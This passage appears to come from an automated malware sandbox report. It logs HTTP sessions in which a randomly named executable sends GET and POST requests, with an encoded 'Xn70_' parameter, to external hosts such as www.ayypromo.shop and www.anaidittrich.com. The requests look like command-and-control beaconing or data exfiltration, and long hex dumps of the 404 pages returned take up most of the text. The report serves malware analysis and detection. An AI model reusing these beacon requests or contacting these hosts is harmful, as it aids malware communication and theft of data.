                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                      Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      32192.168.2.649754176.57.64.102806008C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      TimestampBytes transferredDirectionData
                      Aug 23, 2024 08:28:01.107059002 CEST504OUTGET /rgqx/?Xn70_=k7UoFTYShwNh8X33bnwY0thhVqNwwmygtcywMstwCAmbg7ptW+NBcIDWqO/wkzukyRO00HsnixKpsDOlj0tXpJ/xTrqx42/2gBD027lgSoPVoYuqVtYfG9QcRyu7q583xH9wJHc=&mV=ZpN4DLSXOzy8qX HTTP/1.1
                      Host: www.ayypromo.shop
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Connection: close
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Aug 23, 2024 08:28:01.681355953 CEST727INHTTP/1.1 404 Not Found
                      Server: ddos-guard
                      Connection: close
                      Set-Cookie: __ddg1_=VZpP6SRdlqwV0ic1DCHJ; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Sat, 23-Aug-2025 06:28:01 GMT
                      Date: Fri, 23 Aug 2024 06:28:01 GMT
                      Content-Type: text/html; charset=UTF-8
                      Content-Length: 340
                      Last-Modified: Tue, 29 May 2018 17:41:27 GMT
                      ETag: "154-56d5bbe607fc0"
                      X-Frame-Options: SAMEORIGIN
                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                      Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      33192.168.2.649755162.55.254.209806008C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      TimestampBytes transferredDirectionData
                      Aug 23, 2024 08:28:06.749094963 CEST766OUTPOST /qpwk/ HTTP/1.1
                      Host: www.anaidittrich.com
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.anaidittrich.com
                      Referer: http://www.anaidittrich.com/qpwk/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 210
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Raw: 58 6e 37 30 5f 3d 43 6c 55 75 47 44 75 77 54 30 33 36 77 6b 2b 47 45 76 45 42 4b 37 67 57 6a 4c 53 34 44 2b 2b 42 54 66 6c 34 52 47 2b 37 6f 58 42 6f 65 66 42 2b 50 77 62 6e 69 39 5a 55 63 4b 48 5a 48 46 76 2f 38 6b 42 67 6f 36 61 4c 7a 77 35 46 4e 73 32 6e 38 78 54 49 73 2b 6c 33 4a 6f 38 2f 4b 71 31 55 49 64 67 5a 2b 44 56 42 36 76 66 71 4d 77 70 6b 62 75 42 33 30 73 57 4e 4a 31 4f 74 71 45 47 30 76 74 39 45 46 47 32 43 72 5a 41 30 53 70 5a 53 64 69 51 30 2f 72 6b 4c 33 57 66 4b 38 5a 64 72 72 31 37 48 56 4e 47 62 33 2b 34 57 65 5a 48 32 76 6a 63 69 43 31 4f 74 50 75 58 2f 61 34 48 61 37 4c 71 6c 51 69 76 77 66 44 5a 6f
                      Data Ascii: Xn70_=ClUuGDuwT036wk+GEvEBK7gWjLS4D++BTfl4RG+7oXBoefB+Pwbni9ZUcKHZHFv/8kBgo6aLzw5FNs2n8xTIs+l3Jo8/Kq1UIdgZ+DVB6vfqMwpkbuB30sWNJ1OtqEG0vt9EFG2CrZA0SpZSdiQ0/rkL3WfK8Zdrr17HVNGb3+4WeZH2vjciC1OtPuX/a4Ha7LqlQivwfDZo
                      Aug 23, 2024 08:28:07.442011118 CEST1236INHTTP/1.1 404 Not Found
                      Date: Fri, 23 Aug 2024 06:28:07 GMT
                      Server: Apache
                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                      Cache-Control: no-cache, must-revalidate, max-age=0
                      Link: <http://anaidittrich.com/wp-json/>; rel="https://api.w.org/"
                      Upgrade: h2c
                      Connection: Upgrade, close
                      Transfer-Encoding: chunked
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 31 31 33 35 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 33 2e 31 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 [TRUNCATED]
                      Data Ascii: 11353<!DOCTYPE html><html lang="de-DE"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v23.1 - https://yoast.com/wordpress/plugins/seo/ --><meta property="og:locale" content="de_DE" /><meta property="og:title" content="Seite wurde nicht gefunden. - Anai Dittrich Art, Design, Care" /><meta property="og:site_name" content="Anai Dittrich Art, Design, Care" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"http://anaidittrich.com/#website","url":"http://anaidittrich.com/","name":"Anai Dittrich Art, Design, Care","description":"Mindful design and art projects","potentialAction":[{"@type":"SearchAction","target":{"@
                      Aug 23, 2024 08:28:07.442030907 CEST1236INData Raw: 74 79 70 65 22 3a 22 45 6e 74 72 79 50 6f 69 6e 74 22 2c 22 75 72 6c 54 65 6d 70 6c 61 74 65 22 3a 22 68 74 74 70 3a 2f 2f 61 6e 61 69 64 69 74 74 72 69 63 68 2e 63 6f 6d 2f 3f 73 3d 7b 73 65 61 72 63 68 5f 74 65 72 6d 5f 73 74 72 69 6e 67 7d 22
                      Data Ascii: type":"EntryPoint","urlTemplate":"http://anaidittrich.com/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"de-DE"}]}</script>... / Yoast SEO plugin. --><title>Seite wurde nicht gefunden. - Anai D
                      Aug 23, 2024 08:28:07.442060947 CEST448INData Raw: 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 2c 72 3d 28 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c
                      Data Ascii: 32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return
                      Aug 23, 2024 08:28:07.442075014 CEST1236INData Raw: 66 33 22 29 26 26 21 6e 28 65 2c 22 5c 75 64 38 33 63 5c 75 64 66 66 34 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 64 62 34 30 5c 75 64 63 36 32 5c 75 64 62 34 30 5c 75 64 63 36 35 5c 75 64 62 34 30 5c 75 64 63 36 65 5c 75 64 62 34 30 5c 75 64 63
                      Data Ascii: f3")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(
                      Aug 23, 2024 08:28:07.442086935 CEST1236INData Raw: 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 55 52 4c 26 26 55 52 4c 2e 63 72 65 61 74 65 4f 62 6a 65 63 74 55 52 4c 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 42 6c 6f 62 29 74 72 79 7b 76 61 72 20 65 3d 22
                      Data Ascii: "undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(s),u.toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObje
                      Aug 23, 2024 08:28:07.442100048 CEST448INData Raw: 3a 31 30 30 25 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 69 74 65 2d 6c 6f 67 6f 20 61 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 73 69 74 65 2d 6c 6f 67 6f 20 69 6d 67 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 69 6e 68 65 72 69 74 7d 2e 77 70 2d 62 6c 6f 63
                      Data Ascii: :100%}.wp-block-site-logo a,.wp-block-site-logo img{border-radius:inherit}.wp-block-site-logo.aligncenter{margin-left:auto;margin-right:auto;text-align:center}:root :where(.wp-block-site-logo.is-style-rounded){border-radius:9999px}</style><s
                      Aug 23, 2024 08:28:07.442111969 CEST1236INData Raw: 2d 62 6c 6f 63 6b 2d 67 72 6f 75 70 2d 69 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 29 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 62 6c 6f 63
                      Data Ascii: -block-group-is-layout-constrained){position:relative}</style><style id='wp-block-navigation-link-inline-css'>.wp-block-navigation .wp-block-navigation-item__label{overflow-wrap:break-word}.wp-block-navigation .wp-block-navigation-item__des
                      Aug 23, 2024 08:28:07.442123890 CEST1236INData Raw: 6e 67 2d 6d 6f 64 65 5d 3a 77 68 65 72 65 28 5b 73 74 79 6c 65 2a 3d 76 65 72 74 69 63 61 6c 2d 72 6c 5d 29 2c 68 33 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 6c 65 66 74 5b 73 74 79 6c 65 2a 3d 77 72 69 74 69 6e 67 2d 6d 6f 64 65 5d 3a 77
                      Data Ascii: ng-mode]:where([style*=vertical-rl]),h3.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h3.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h4.has-text-align-left[style*=writing-mode]:where([style*=ver
                      Aug 23, 2024 08:28:07.442150116 CEST448INData Raw: 09 09 09 09 63 6f 6e 74 65 6e 74 3a 20 6e 6f 6e 65 3b 0a 09 09 09 09 7d 0a 0a 09 09 09 09 2e 69 73 2d 73 74 79 6c 65 2d 61 73 74 65 72 69 73 6b 3a 2d 6d 6f 7a 2d 6f 6e 6c 79 2d 77 68 69 74 65 73 70 61 63 65 3a 62 65 66 6f 72 65 20 7b 0a 09 09 09
                      Data Ascii: content: none;}.is-style-asterisk:-moz-only-whitespace:before {content: none;}.is-style-asterisk.has-text-align-center:before {margin: 0 auto;}.is-style-asterisk.has-text-align-right:before {
                      Aug 23, 2024 08:28:07.442161083 CEST1236INData Raw: 72 65 67 75 6c 61 72 2d 74 65 78 74 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 7d 2e 69 73 2d 6c 61 72 67 65 2d 74 65 78 74 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 32 35 65 6d 7d 2e 69 73 2d 6c 61 72 67 65 72 2d 74 65 78 74 7b 66 6f 6e 74 2d 73 69
                      Data Ascii: regular-text{font-size:1em}.is-large-text{font-size:2.25em}.is-larger-text{font-size:3em}.has-drop-cap:not(:focus):first-letter{float:left;font-size:8.4em;font-style:normal;font-weight:100;line-height:.68;margin:.05em .1em 0 0;text-transform:u
                      Aug 23, 2024 08:28:07.446976900 CEST1236INData Raw: 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 73 65 74 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 62 75 74 74 6f 6e 2d 6f 6e 6c 79 20 2e 77 70
                      Data Ascii: ;text-decoration:unset!important}.wp-block-search.wp-block-search__button-only .wp-block-search__button{flex-shrink:0;margin-left:0;max-width:100%}.wp-block-search.wp-block-search__button-only .wp-block-search__button[aria-expanded=true]{max-w


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      34192.168.2.649756162.55.254.209806008C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      TimestampBytes transferredDirectionData
                      Aug 23, 2024 08:28:09.294709921 CEST790OUTPOST /qpwk/ HTTP/1.1
                      Host: www.anaidittrich.com
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.anaidittrich.com
                      Referer: http://www.anaidittrich.com/qpwk/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 234
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Raw: 58 6e 37 30 5f 3d 43 6c 55 75 47 44 75 77 54 30 33 36 78 45 75 47 4c 73 73 42 4d 62 67 5a 76 72 53 34 57 4f 2b 46 54 66 35 34 52 48 36 53 6f 6a 74 6f 65 39 4a 2b 4f 79 6a 6e 68 39 5a 55 57 71 48 63 4a 6c 76 77 38 6b 46 65 6f 37 6d 4c 7a 77 64 46 4e 70 4b 6e 38 47 48 4c 73 75 6c 78 42 49 38 39 48 4b 31 55 49 64 67 5a 2b 44 6f 6b 36 76 58 71 4d 41 31 6b 4b 2f 42 30 35 4d 57 4f 65 46 4f 74 68 6b 47 6f 76 74 39 71 46 48 71 34 72 62 49 30 53 73 6c 53 5a 6d 4d 37 31 72 6b 4e 34 32 65 69 33 70 55 2f 6c 45 47 45 63 38 65 6b 72 73 4e 78 62 76 47 73 7a 51 63 42 51 6c 75 76 50 73 50 4e 61 59 48 77 35 4c 53 6c 43 31 6a 58 51 33 38 4c 41 4e 75 5a 43 71 67 51 2b 44 70 4c 68 49 47 6b 57 62 75 77 4b 77 3d 3d
                      Data Ascii: Xn70_=ClUuGDuwT036xEuGLssBMbgZvrS4WO+FTf54RH6Sojtoe9J+Oyjnh9ZUWqHcJlvw8kFeo7mLzwdFNpKn8GHLsulxBI89HK1UIdgZ+Dok6vXqMA1kK/B05MWOeFOthkGovt9qFHq4rbI0SslSZmM71rkN42ei3pU/lEGEc8ekrsNxbvGszQcBQluvPsPNaYHw5LSlC1jXQ38LANuZCqgQ+DpLhIGkWbuwKw==
                      Aug 23, 2024 08:28:10.023159981 CEST1236INHTTP/1.1 404 Not Found
                      Date: Fri, 23 Aug 2024 06:28:09 GMT
                      Server: Apache
                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                      Cache-Control: no-cache, must-revalidate, max-age=0
                      Link: <http://anaidittrich.com/wp-json/>; rel="https://api.w.org/"
                      Upgrade: h2c
                      Connection: Upgrade, close
                      Transfer-Encoding: chunked
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 31 31 33 35 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 33 2e 31 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 [TRUNCATED]
                      Data Ascii: 11353<!DOCTYPE html><html lang="de-DE"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v23.1 - https://yoast.com/wordpress/plugins/seo/ --><meta property="og:locale" content="de_DE" /><meta property="og:title" content="Seite wurde nicht gefunden. - Anai Dittrich Art, Design, Care" /><meta property="og:site_name" content="Anai Dittrich Art, Design, Care" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"http://anaidittrich.com/#website","url":"http://anaidittrich.com/","name":"Anai Dittrich Art, Design, Care","description":"Mindful design and art projects","potentialAction":[{"@type":"SearchAction","target":{"@
                      Aug 23, 2024 08:28:10.023180008 CEST1236INData Raw: 74 79 70 65 22 3a 22 45 6e 74 72 79 50 6f 69 6e 74 22 2c 22 75 72 6c 54 65 6d 70 6c 61 74 65 22 3a 22 68 74 74 70 3a 2f 2f 61 6e 61 69 64 69 74 74 72 69 63 68 2e 63 6f 6d 2f 3f 73 3d 7b 73 65 61 72 63 68 5f 74 65 72 6d 5f 73 74 72 69 6e 67 7d 22
                      Data Ascii: type":"EntryPoint","urlTemplate":"http://anaidittrich.com/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"de-DE"}]}</script>... / Yoast SEO plugin. --><title>Seite wurde nicht gefunden. - Anai D
                      Aug 23, 2024 08:28:10.023192883 CEST448INData Raw: 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 2c 72 3d 28 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c
                      Data Ascii: 32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return
                      Aug 23, 2024 08:28:10.023206949 CEST1236INData Raw: 66 33 22 29 26 26 21 6e 28 65 2c 22 5c 75 64 38 33 63 5c 75 64 66 66 34 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 64 62 34 30 5c 75 64 63 36 32 5c 75 64 62 34 30 5c 75 64 63 36 35 5c 75 64 62 34 30 5c 75 64 63 36 65 5c 75 64 62 34 30 5c 75 64 63
                      Data Ascii: f3")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(
                      Aug 23, 2024 08:28:10.023226023 CEST1236INData Raw: 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 55 52 4c 26 26 55 52 4c 2e 63 72 65 61 74 65 4f 62 6a 65 63 74 55 52 4c 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 42 6c 6f 62 29 74 72 79 7b 76 61 72 20 65 3d 22
                      Data Ascii: "undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(s),u.toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObje
                      Aug 23, 2024 08:28:10.023236990 CEST1236INData Raw: 3a 31 30 30 25 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 69 74 65 2d 6c 6f 67 6f 20 61 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 73 69 74 65 2d 6c 6f 67 6f 20 69 6d 67 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 69 6e 68 65 72 69 74 7d 2e 77 70 2d 62 6c 6f 63
                      Data Ascii: :100%}.wp-block-site-logo a,.wp-block-site-logo img{border-radius:inherit}.wp-block-site-logo.aligncenter{margin-left:auto;margin-right:auto;text-align:center}:root :where(.wp-block-site-logo.is-style-rounded){border-radius:9999px}</style><s
                      Aug 23, 2024 08:28:10.023252010 CEST1236INData Raw: 3d 36 2e 36 2e 31 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 68 65 61 64 69 6e 67 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 68 31 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2c
                      Data Ascii: =6.6.1' media='all' /><style id='wp-block-heading-inline-css'>h1.has-background,h2.has-background,h3.has-background,h4.has-background,h5.has-background,h6.has-background{padding:1.25em 2.375em}h1.has-text-align-left[style*=writing-mode]:wher
                      Aug 23, 2024 08:28:10.023264885 CEST1236INData Raw: 29 3b 0a 09 09 09 09 09 63 6c 69 70 2d 70 61 74 68 3a 20 70 61 74 68 28 27 4d 31 31 2e 39 33 2e 36 38 34 76 38 2e 30 33 39 6c 35 2e 36 33 33 2d 35 2e 36 33 33 20 31 2e 32 31 36 20 31 2e 32 33 2d 35 2e 36 36 20 35 2e 36 36 68 38 2e 30 34 76 31 2e
                      Data Ascii: );clip-path: path('M11.93.684v8.039l5.633-5.633 1.216 1.23-5.66 5.66h8.04v1.737H13.2l5.701 5.701-1.23 1.23-5.742-5.742V21h-1.737v-8.094l-5.77 5.77-1.23-1.217 5.743-5.742H.842V9.98h8.162l-5.701-5.7 1.23-1.231 5.66 5.66V.684h1.737Z');
                      Aug 23, 2024 08:28:10.023279905 CEST1236INData Raw: 61 70 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 3a 72 6f 6f 74 20 3a 77 68 65 72 65 28 70 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 29 7b 70 61 64 64 69 6e 67 3a 31 2e 32 35 65 6d 20 32 2e
                      Data Ascii: ap.has-background{overflow:hidden}:root :where(p.has-background){padding:1.25em 2.375em}:where(p.has-text-color:not(.has-link-color)) a{color:inherit}p.has-text-align-left[style*="writing-mode:vertical-lr"],p.has-text-align-right[style*="writi
                      Aug 23, 2024 08:28:10.023293972 CEST1236INData Raw: 61 70 70 65 72 7b 6d 69 6e 2d 77 69 64 74 68 3a 30 21 69 6d 70 6f 72 74 61 6e 74 3b 74 72 61 6e 73 69 74 69 6f 6e 2d 70 72 6f 70 65 72 74 79 3a 77 69 64 74 68 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65
                      Data Ascii: apper{min-width:0!important;transition-property:width}.wp-block-search.wp-block-search__button-only .wp-block-search__input{flex-basis:100%;transition-duration:.3s}.wp-block-search.wp-block-search__button-only.wp-block-search__searchfield-hidd
